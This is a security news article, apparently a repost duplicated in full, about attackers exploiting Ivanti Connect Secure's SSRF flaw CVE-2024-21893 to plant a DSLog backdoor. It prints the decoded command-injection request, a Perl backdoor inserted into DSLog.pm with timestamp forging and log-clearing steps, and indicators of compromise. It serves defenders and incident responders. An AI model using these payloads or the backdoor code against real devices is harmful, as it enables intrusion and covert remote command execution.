Hackers Exploiting Ivanti SSRF Flaw to Inject DSLog Malware
- С сайта: Vulnerability(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Vulnerability(cybersecuritynews.com)
Ivanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High).
In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.
📁🄳🄾🄲🅄🄼🄴🄽🅃
Hackers Exploiting Ivanti SSRF Flaw
According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.
Initial request
During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.
Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.
http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname –
a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;
This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.
Backdoor Installation
Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:
http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw /
DESTFILE=”/home/perl/DSLog.pm”
CLFILE=”/home/perl/DSLogMB.pm”
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then
echo ‘OK’;
else
sed -i ‘102i\\ my \$ua = \$\ENV{HTTP_USER_AGENT};\n my \$req =
\$\ENV{QUERY_STRING};\n my \$qur =
\”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7\”;\n my @param =
split(/&/, \$req);\n if (index(\$ua, \$qur) != -1) {\n if (\$param[1]){\n my @res = split(/=/,
\$param[1]);\n if (\$res[0] eq \”cdi\”){\n \$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex(\$1))/eg;\n
\$res[1] =~ tr/!-~/P-~!-O/;\n system(\${res[1]});\n }\n }\n }’ $DESTFILE
fi
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
/bin/bash;Decoded backdoor command (Source: Orange Cyber Defense)
This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.
Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.
Indicators of Compromise
Host-based IoC
Path + filename Hash Description /root/home/perl/DSLog[.]pmN/A – varies Legitimate DSLog Log module embedding the/root/home/webserver/htdocs/danana/imgs/index[.]txtN/A – varies backdoor/root/home/webserver/htdocs/danana/imgs/index1[.]txtN/A – varies Some seem to be random characters./root/home/webserver/htdocs/danana/imgs/index2[.]txtN/A – varies Some seem to be random characters./root/home/webserver/htdocs/danana/imgs/logo[.]pngEmbedding the result of ‘uname -a’
Network-based IoC
Network Indicator Type Description 159.65.123.122IP AddressMassive exploitation activity
#Cyber_Security_News #Vulnerability #cyber_security #cyber_security_news #Ivanti_SSRF_flaw #vulnerability
Оригинальная версия на сайте:
Hackers Exploiting Ivanti SSRF Flaw to Inject DSLog Malware
Author: EswarIvanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High).
In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.
📁🄳🄾🄲🅄🄼🄴🄽🅃
Hackers Exploiting Ivanti SSRF Flaw
According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.
Initial request
During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.
Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.
http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname –
a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;
This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.
Backdoor Installation
Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:
http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw /
DESTFILE=”/home/perl/DSLog.pm”
CLFILE=”/home/perl/DSLogMB.pm”
if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then
echo ‘OK’;
else
sed -i ‘102i\\ my \$ua = \$\ENV{HTTP_USER_AGENT};\n my \$req =
\$\ENV{QUERY_STRING};\n my \$qur =
\”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7\”;\n my @param =
split(/&/, \$req);\n if (index(\$ua, \$qur) != -1) {\n if (\$param[1]){\n my @res = split(/=/,
\$param[1]);\n if (\$res[0] eq \”cdi\”){\n \$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex(\$1))/eg;\n
\$res[1] =~ tr/!-~/P-~!-O/;\n system(\${res[1]});\n }\n }\n }’ $DESTFILE
fi
/bin/touch -r $CLFILE $DESTFILE
rm -rf /var/cores/*
/home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d |
/bin/bash;Decoded backdoor command (Source: Orange Cyber Defense)
This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.
Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.
Indicators of Compromise
Host-based IoC
Path + filename Hash Description /root/home/perl/DSLog[.]pmN/A – varies Legitimate DSLog Log module embedding the/root/home/webserver/htdocs/danana/imgs/index[.]txtN/A – varies backdoor/root/home/webserver/htdocs/danana/imgs/index1[.]txtN/A – varies Some seem to be random characters./root/home/webserver/htdocs/danana/imgs/index2[.]txtN/A – varies Some seem to be random characters./root/home/webserver/htdocs/danana/imgs/logo[.]pngEmbedding the result of ‘uname -a’
Network-based IoC
Network Indicator Type Description 159.65.123.122IP AddressMassive exploitation activity
#Cyber_Security_News #Vulnerability #cyber_security #cyber_security_news #Ivanti_SSRF_flaw #vulnerability
Оригинальная версия на сайте:
